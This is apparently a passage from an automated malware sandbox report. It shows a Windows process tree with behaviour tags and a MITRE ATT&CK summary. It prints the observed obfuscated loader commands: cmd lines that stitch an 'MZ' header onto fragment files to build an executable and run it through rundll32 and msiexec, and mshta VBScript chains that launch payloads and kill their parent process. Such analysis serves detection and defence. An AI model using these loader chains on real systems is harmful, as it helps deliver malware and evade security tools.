C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C EChO | SEt /p = "MZ" > CPkPI.i &CopY /b /Y CPkpI.I+ sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K &Del /Q *12⤵PID:1560
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵PID:3240
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>CPkPI.i"13⤵PID:5836
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EChO "13⤵
- Blocklisted process makes network request
PID:4648
-
-
C:\Windows\SysWOW64\control.execontrol ..\WfNRfms4.K13⤵
- Executes dropped EXE
PID:5948 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\WfNRfms4.K14⤵
- Loads dropped DLL
PID:6000 -
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\WfNRfms4.K15⤵PID:3796
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\WfNRfms4.K16⤵
- Loads dropped DLL
PID:3572
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\435056.exe"C:\Users\Admin\AppData\Roaming\435056.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5960 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"8⤵
- Executes dropped EXE
PID:4832
-
-
-
C:\Users\Admin\AppData\Roaming\8581712.exe"C:\Users\Admin\AppData\Roaming\8581712.exe"7⤵
- Executes dropped EXE
PID:3504
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue192762f1cd058ddf8.exe5⤵PID:3704
-
C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue192762f1cd058ddf8.exeTue192762f1cd058ddf8.exe6⤵
- Executes dropped EXE
PID:2952
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue193858933525b62.exe5⤵PID:3668
-
C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue193858933525b62.exeTue193858933525b62.exe6⤵
- Executes dropped EXE
PID:3316 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue193858933525b62.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue193858933525b62.exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))7⤵PID:1648
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue193858933525b62.exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue193858933525b62.exe") do taskkill -iM "%~nXx" /f8⤵PID:5448
-
C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ9⤵
- Executes dropped EXE
PID:6012 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))10⤵PID:6128
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f11⤵PID:5336
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE (cREatEObjEcT ( "wscript.sHeLl" ).Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+ y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 ,TruE ) )10⤵PID:5732
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E &Start msiexec -Y .\bENCc.E11⤵PID:5272
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"12⤵PID:5656
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECHO "12⤵PID:3240
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y .\bENCc.E12⤵
- Loads dropped DLL
PID:4700
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "Tue193858933525b62.exe" /f9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6060
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19325eb008c0b950.exe5⤵PID:4188
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1952 -s 6445⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:5156
-
-
-
-
-
C:\Windows\SysWOW64\wlanext.exe"C:\Windows\SysWOW64\wlanext.exe"2⤵
- Adds policy Run key to start application
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:5792 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\bogAMCgr_ceyHDpTDqaFFCso.exe"3⤵PID:4724
-
-
-
C:\Program Files (x86)\Y8pyhfft\lnz8vvkdnpkx.exe"C:\Program Files (x86)\Y8pyhfft\lnz8vvkdnpkx.exe"2⤵
- Executes dropped EXE
PID:2564
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19325eb008c0b950.exeTue19325eb008c0b950.exe1⤵
- Executes dropped EXE
PID:4840
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1952 -ip 19521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:840
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4648 -ip 46481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5728
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe a454731f9e1ab86af298c83b44bc0881 /wQZQ2ddR0eUW1NvDehkHw.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
PID:5708
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4828 -ip 48281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1816
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5232 -ip 52321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4284
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 3552 -ip 35521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5952
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2292 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:468
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 904 -ip 9041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3668
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 468 -ip 4681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4336
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:5360
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3104 -ip 31041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Checks processor information in registry
PID:4796 -
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵PID:2096
-
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵PID:5884
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4896 -ip 48961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2500
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe a454731f9e1ab86af298c83b44bc0881 /wQZQ2ddR0eUW1NvDehkHw.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
PID:5236
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
3Scheduled Task
1Defense Evasion
Disabling Security Tools
1Modify Registry
5Virtualization/Sandbox Evasion
1Web Service
1